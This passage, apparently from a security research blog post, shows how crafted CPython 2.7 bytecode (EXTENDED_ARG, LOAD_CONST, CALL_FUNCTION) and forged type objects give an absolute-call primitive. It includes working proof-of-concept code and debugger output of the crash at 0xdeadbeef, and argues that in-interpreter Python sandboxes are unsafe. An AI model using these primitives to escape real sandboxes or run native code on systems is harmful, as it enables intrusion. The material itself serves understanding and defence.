high = offset >> 16
low =  offset & 0xffff
print 'Consts tuple @%#.8x' % address_consts
print 'Address of controled data @%#.8x' % address_s
print 'Offset between const and our object: @%#.8x' % offset
print 'Going to push [%#.8x] on the virtual stack' % (address_consts + (address_s - address_consts - 0xC) + 0xc)

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG']) + pshort(high) +
  chr(opcode.opmap['LOAD_CONST'])   + pshort(low),
  consts, (), (), '', '', 0, ''
)
a()

..annnnd..

D:\>python 1.py
Consts tuple @0x01db1030
Address of controled data @0x022a0654
Offset between const and our object: @0x0013bd86
Going to push [0x022a0654] on the virtual stack

*JIT debugger pops*

eax=01db1030 ebx=00000000 ecx=00000063 edx=00000046 esi=deadbeef edi=0013bd86
eip=1e0ec5fb esp=0027fc68 ebp=01e63fc0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010287
python27!PyEval_EvalFrameEx+0x34b:
1e0ec5fb ff06            inc     dword ptr [esi]      ds:002b:deadbeef=????????

0:000> ub eip l1
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch]

0:000> ? eax+edi*4+c
Evaluate expression: 36308564 = 022a0654

0:000> dd 022a0654 l1
022a0654  deadbeef <- the data we control in our PyStringObject

0:000> dps 022a0654-0n20 l2
022a0640  00000003
022a0644  1e226798 python27!PyString_Type

Perfect, we control a part of the virtual stack :).

Game over, LOAD_FUNCTION

Once you control the virtual stack, the only limit is your imagination and the ability you have to find an interesting spot in the virtual machine. My idea was to use the CALL_FUNCTION opcode to craft a PyFunctionObject somehow, push it onto the virtual stack and to use the magic opcode.

typedef struct {
  PyObject_HEAD
  PyObject *func_code;  /* A code object */
  PyObject *func_globals; /* A dictionary (other mappings won't do) */
  PyObject *func_defaults;  /* NULL or a tuple */
  PyObject *func_closure; /* NULL or a tuple of cell objects */
  PyObject *func_doc;   /* The __doc__ attribute, can be anything */
  PyObject *func_name;  /* The __name__ attribute, a string object */
  PyObject *func_dict;  /* The __dict__ attribute, a dict or NULL */
  PyObject *func_weakreflist; /* List of weak references */
  PyObject *func_module;  /* The __module__ attribute, can be anything */
} PyFunctionObject;

The thing is, as we saw earlier, the virtual machine usually ensures the type of the object it handles. If the type checking fails, the function bails out and we are not happy, at all. It means we would need an information-leak to obtain a pointer to the PyFunction_Type static variable.

Fortunately for us, the CALL_FUNCTION can still be abused without knowing that magic pointer to craft correctly our object. Let's go over the source code to illustrate my sayings:

case CALL_FUNCTION:
{
  PyObject **sp;
  PCALL(PCALL_ALL);
  sp = stack_pointer;
  x = call_function(&sp, oparg);

static PyObject *
call_function(PyObject ***pp_stack, int oparg)
{
  int na = oparg & 0xff;
  int nk = (oparg>>8) & 0xff;
  int n = na + 2 * nk;
  PyObject **pfunc = (*pp_stack) - n - 1;
  PyObject *func = *pfunc;
  PyObject *x, *w;

  if (PyCFunction_Check(func) && nk == 0) {
    // ..Nope..
  } else {
    if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
      // ..Still Nope...
    } else
    if (PyFunction_Check(func))
      // Nope!
    else
      x = do_call(func, pp_stack, na, nk);

static PyObject *
do_call(PyObject *func, PyObject ***pp_stack, int na, int nk)
{
  // ...
  if (PyCFunction_Check(func)) {
    // Nope
  }
  else
    result = PyObject_Call(func, callargs, kwdict);

PyObject *
PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw)
{
  ternaryfunc call;

  if ((call = func->ob_type->tp_call) != NULL) {
    PyObject *result;
    // Yay an interesting call :)
    result = (*call)(func, arg, kw);

So basically the idea to use CALL_FUNCTION was a good one, but we will need to craft two different objects:

  1. The first one will be a PyObject with ob_type pointing to the second object
  2. The second object will be a _typeobject with tp_call the address you want to call

This is fairly trivial to do and will give us an absolute-call primitive without crashing the interpreter: s.w.e.e.t.

import opcode
import types
import struct

def pshort(s):
  return struct.pack('<H', s)

def puint(s):
  return struct.pack('<I', s)

def a():
  pass

PyStringObject_to_char_array_offset = 20
second_object = 'A' * 0x40 + puint(0xdeadbeef)
addr_second_object = id(second_object)
addr_second_object_controled_data = addr_second_object + PyStringObject_to_char_array_offset

first_object = 'AAAA' + puint(addr_second_object_controled_data)
addr_first_object = id(first_object)
addr_first_object_controled_data = addr_first_object + PyStringObject_to_char_array_offset

consts = ()
s = puint(addr_first_object_controled_data)
address_s = id(s) + PyStringObject_to_char_array_offset
address_consts = id(consts)
offset = ((address_s - address_consts - 0xC) / 4) & 0xffffffff

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG'])  + pshort(offset >> 16)     +
  chr(opcode.opmap['LOAD_CONST'])    + pshort(offset & 0xffff)  +
  chr(opcode.opmap['CALL_FUNCTION']) + pshort(0),
  consts, (), (), '', '', 0, ''
)
a()

And we finally get our primitive working :-)

(11d0.11cc): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Python\Python275\python27.dll - 
eax=01cc1030 ebx=00000000 ecx=00422e78 edx=00000000 esi=deadbeef edi=02e62df4
eip=deadbeef esp=0027e78c ebp=02e62df4 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010283
deadbeef ??              ???

So now you know all the nasty things going under the hood with that python27_abuse_vm_to_execute_x86_code.py script!

Conclusion, Ideas

After reading this little post you are now aware that if you want to sandbox efficiently Python, you should do it outside of Python and not by preventing the use of some modules or things like that: this is broken by design. The virtual machine is not safe enough to build a strong sandbox inside Python, so don't rely on such thing if you don't want to get surprised. An article about that exact same thing was written here if you are interested: The failure of pysandbox.

You also may want to look at PyPy's sandboxing capability if you are interested in executing untrusted Python code. Otherwise, you can build your own SECCOMP-based system :).

On the other hand, I had a lot of fun taking a deep dive into Python's source code and I hope you had some too! If you would like to know more about the low level aspects of Python here are a list of interesting posts:

Folks, that's all for today ; don't hesitate to contact us if you have a cool post!

❌
❌